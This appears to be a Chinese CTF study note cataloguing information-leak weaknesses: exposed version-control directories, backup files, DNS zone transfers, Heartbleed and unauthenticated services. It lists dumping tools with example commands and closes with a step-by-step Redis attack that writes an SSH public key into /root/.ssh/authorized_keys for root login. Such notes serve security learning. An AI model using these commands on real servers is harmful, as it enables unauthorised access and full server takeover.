CTF之信息泄漏
web源码泄漏
.hg源码泄漏:
漏洞成因:hg init的时候会生成.hg,http://www.xx.com/.hg/,
工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/)
.git源码泄漏:
漏洞成因:在运行git init初始化代码库的时候,会在当前目录下产生一个.git的隐藏文件,用来记录代码的变更记录等,没有删除这个文件,导致泄漏,http://www.xxx.com/.git/config
工具:GitHack,dvcs-ripper,(GitHack.py http://www.xxx.com/.git,rip-hg.pl -v -u http://www.xx.com/.git/)
.DS_Store源码泄漏:
漏洞成因:在发布代码时,没有删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息,http://www.xxx.com/.ds_store
工具:dsstoreexp,(python ds_store_exp.py http://www.xxx.com/.DS_Store)
网站备份压缩文件:
在网站的使用过程中,往往需要对网站中的文件进行修改,升级,此时就需要对网站整或其中某一页面进行备份,当备份文件或修改过程中的缓存文件因为各种原因被留在网站web目录下,而该目录又没有设置访问权限,就有可能导致备份文件被下载,导致信息泄漏,给服务器安全埋下隐患。.rar, .zip, .7z, .tar.gz, .bak, .swp, .txt, .html,
工具:可以使用一些扫描软件,进行扫描,如awvs之类的
像.swp文件,就是vim源文件泄漏,/.index.php.swp或/index.php~ 可以直接用vim -r inde.php来读取文件
SVN导致文件泄漏:
版本控制系统
工具:dvcs-ripper,Seay-Svn,(rip-svn.pl -v -u http://www.xxx.com/.svn/)
应用层泄漏
DNS域传送:
dns服务器的主备数据同步,使用的是域传送功能,如果使用默认配置文件进行配置,就会存在dns域传送漏洞(不手动添加allow-transfer)
工具:dig @1.1.1.1 xxx.com axfr (会泄漏一些信息)
HeartBleed:
利用https
从堆栈错误泄漏到RCE:
利用报错,泄漏信息,利用函数try{....}catche(e){e.printstack;}
未授权访问漏洞:
未授权访问----应用层服务的问题,服务启动后,没配置任何凭证,导致可以直接进入
弱口令---配置的密码过于简单常见
空口令---没配置密码
目前主要存在未授权访问漏洞的如下:
NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,Redis,ZooKeeper,
ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等,这些都是挖矿勒索的高发地带
如:
redis为授权访问漏洞,默认情况下会绑定在0.0.0.0:6379,这样会将redis服务暴露到公网上,如果没有开启认证的情况下,可以导致任意用户可以访问目标服务器,可以利用相关方法,在redis服务器上写入公钥,进而可以使用对应私钥直接登陆目标服务器。
1.本地生成公钥私钥
ssh-keygen -t rsa
2.把公钥写入xx.txt文件
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > xx.txt
3.连接redis写入文件
cat xx.txt | redis-cli -h 192.168.1.2 -x set crackit
redis-cli -h 192.168.1.2
192.168.1.2:6379> config set dir /root/.ssh/
192.168.1.2:6379> config get dir
1)"dir"
2)"/root/.ssh"
192.168.1.2:6379> config set dbfilename "authorized_keys"
192.168.1.2"6379> save
也可以使用msf里面成熟的exp来利用
友情链接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn